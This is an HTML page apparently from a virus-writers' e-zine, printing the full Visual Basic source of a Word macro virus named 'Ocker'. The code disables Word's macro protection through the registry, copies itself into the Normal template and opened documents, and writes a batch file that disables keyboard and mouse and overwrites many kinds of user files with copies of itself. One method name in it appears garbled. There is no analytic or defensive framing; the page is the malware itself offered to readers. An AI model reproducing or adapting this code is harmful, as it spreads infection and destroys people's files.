<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="27.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="29.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Ocker by Necronomikon</u></b>
<p><u>file ocker.cls:</u>
<p>VERSION 1.0 CLASS
<br>BEGIN
<br>&nbsp;&nbsp;MultiUse = -1  'True
<br>END
<br>Attribute VB_Name = "ThisDocument"
<br>Attribute VB_GlobalNameSpace = False
<br>Attribute VB_Creatable = False
<br>Attribute VB_PredeclaredId = True
<br>Attribute VB_Exposed = True
<br>Sub Document_Open()
<br>On Error Resume Next
<br>Options.VirusProtection = 0
<br>Options.ConfirmConversions = 0
<br>Options.SaveNormalPrompt = 0
<br>System.PrivateProfileString("HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", " Level ") = 1&
<br>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
<br>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
<br>Nec = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
<br>KKS = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
<br>Application.EnableCancelKey = 0
<br>If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
<br>Set PSHQ = ActiveDocument.VBProject.VBComponents.Item(1)
<br>Code = True
<br>End If
<br>If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
<br>Set PSHQ = NormalTemplate.VBProject.VBComponents.Item(1)
<br>THC = True
<br>End If
<br>If THC = True Then
<br>ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\" & Application.UserInitials
<br>PSHQ.CodeModule.PSHQdFromFile ("c:\" & Application.UserInitials)
<br>PSHQ.CodeModule.deletelines 1, 4
<br>PSHQ.CodeModule.replaceline 1, "Sub Document_Close()"
<br>ElseIf Code = True Then
<br>PSHQ.CodeModule.PSHQdFromFile ("c:\" & Application.UserInitials)
<br>PSHQ.CodeModule.deletelines 1, 4
<br>End If
<br>Open "c:\""windows\system\ocker.bat" For Output As #1
<br>Print #1, "@Echo off"
<br>Print #1, "ECHO *******************"
<br>Print #1, "ECHO *ocker.Batch Virus*"
<br>Print #1, "ECHO *******************"
<br>Print #1, "ECHO Coded by Necronomikon[ZeroGravity]"
<br>Print #1, "ctty nul"
<br>Print #1, "rundll32.exe Keyboard, Disable"
<br>Print #1, "rundll32.exe mouse, Disable"
<br>Print #1, "Copy ocker.bat C:\Windows\System\ocker.bat"
<br>Print #1, "IF NOT EXIST C:\Windows\System\ocker.bat GOTO END"
<br>Print #1, "C:"
<br>Print #1, "cd %windir%"
<br>Print #1, "cd System"
<br>Print #1, ": Start"
<br>Print #1, "for %%f in (*.htm *.pas *.bas *.nfo *.sys *.com *.c *.zip *.ini *.gif *.exe *.obj *.wav *.dat *.dll *.txt *.doc *.bmp *.jpg *.cls *.frm ) do set A=%%f"
<br>Print #1, "if %A%==Command.com set A="
<br>Print #1, "if %A%==System.ini set A="
<br>Print #1, "if %A%==MsDos.sys set A="
<br>Print #1, "Copy ocker.bat %A%"
<br>Print #1, "ren %A% *.NEC"
<br>Print #1, "set A="
<br>Print #1, "GoTo Start"
<br>Print #1, ": End"
<br>Print #1, "ctty con"
<br>Close #1
<br>Application.Caption = "You are infected with 'ocker'"
<br>Application.StatusBar = True
<br>StatusBar = "(c)30-07-2001 Necronomikon[ZeroGravity]"
<br>'Ocker
<br>'(c)30-07-2001 Necronomikon[ZeroGravity]
<br>End Sub
<br>&nbsp;
</body>
</html>